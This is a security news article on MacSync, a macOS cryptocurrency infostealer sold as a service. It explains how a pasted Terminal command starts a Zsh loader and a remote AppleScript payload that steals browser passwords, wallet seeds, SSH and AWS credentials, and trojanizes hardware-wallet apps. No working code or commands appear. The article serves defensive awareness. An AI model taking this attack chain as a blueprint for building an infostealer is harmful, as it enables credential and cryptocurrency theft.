A new macOS malware named MacSync is posing a significant threat to cryptocurrency users, employing sophisticated social engineering tactics to harvest sensitive data. This infostealer, operating as a Malware-as-a-Service (MaaS), tricks victims into pasting a single command into their Terminal application, thereby bypassing macOS security measures and compromising their systems. Researchers discovered MacSync while investigating phishing campaigns mimicking Microsoft login pages, leading to fake cloud storage installer pages that guide users through the deceptive Terminal installation process.
This sophisticated MacSync macOS infostealer represents a notable evolution from earlier threats like Mac.c stealer. Its affordability and modular design, specifically tailored for cryptocurrency data theft, have made it an attractive tool for cybercriminals. The malware’s infection mechanism exploits user trust, presenting itself through landing pages that mimic legitimate software with indicators like a “Verified Publisher” badge. A single copied command, when pasted into the Terminal, can initiate the entire compromise, effectively circumventing macOS’s Gatekeeper and code notarization checks.
The MacSync Infection Mechanism and Data Harvesting Strategy Emerge
Security researchers at CloudSEK have detailed MacSync’s multi-stage attack, which operates entirely through scripts rather than compiled binaries. The process begins with the download of a daemonized Zsh loader. This loader detaches from the Terminal session and executes silently in the background. Subsequently, it retrieves and runs a remote AppleScript payload, which contains the core data-stealing functionalities.
MacSync’s primary objective is the precise extraction of cryptocurrency-related data. Upon execution, the malware employs a social engineering tactic by displaying persistent, fake system dialogs that demand the victim’s login password under the guise of system verification. These constant prompts are designed to wear down user resistance, ultimately leading them to divulge their credentials.
Once the password is obtained, MacSync systematically targets browser data. It harvests browser profiles from popular Chromium-based browsers such as Chrome, Brave, Edge, and Opera, extracting stored passwords and authentication cookies. The infostealer specifically targets numerous cryptocurrency wallet browser extensions and desktop wallet applications including Exodus, Electrum, and Bitcoin Core. It achieves this by locating their installation directories and copying wallet seed phrases and private keys.
Adding to its repertoire, the malware also pilfers SSH keys, AWS credentials, Keychain databases, and sensitive information stored in Apple Notes. To ensure long-term access and impact, MacSync conditionally trojanizes hardware wallet applications like Ledger and Trezor if detected on infected systems. This involves overwriting critical application components and replacing legitimate software with malicious versions. These fake applications present convincing phishing wizards designed to capture PINs and recovery phrases weeks or even months after the initial infection.
The supporting infrastructure for MacSync is robust, utilizing at least eight rotating command and control (C2) domains that follow consistent naming conventions. The presence of multiple variant lure pages indicates ongoing campaign evolution and adaptation. This consistent reuse of infrastructure and the malware’s modular design underscore that MacSync represents a continuously evolving and scalable operation. The primary target remains the macOS cryptocurrency community, which is being exploited through these deceptive social engineering tactics.
The ongoing evolution of MacSync highlights the persistent threat of sophisticated macOS malware targeting valuable financial data. Users are advised to exercise extreme caution with unexpected Pop-ups and Terminal commands, and to ensure their macOS systems are protected by up-to-date security software and vigilant practices to avoid falling victim to such targeted attacks.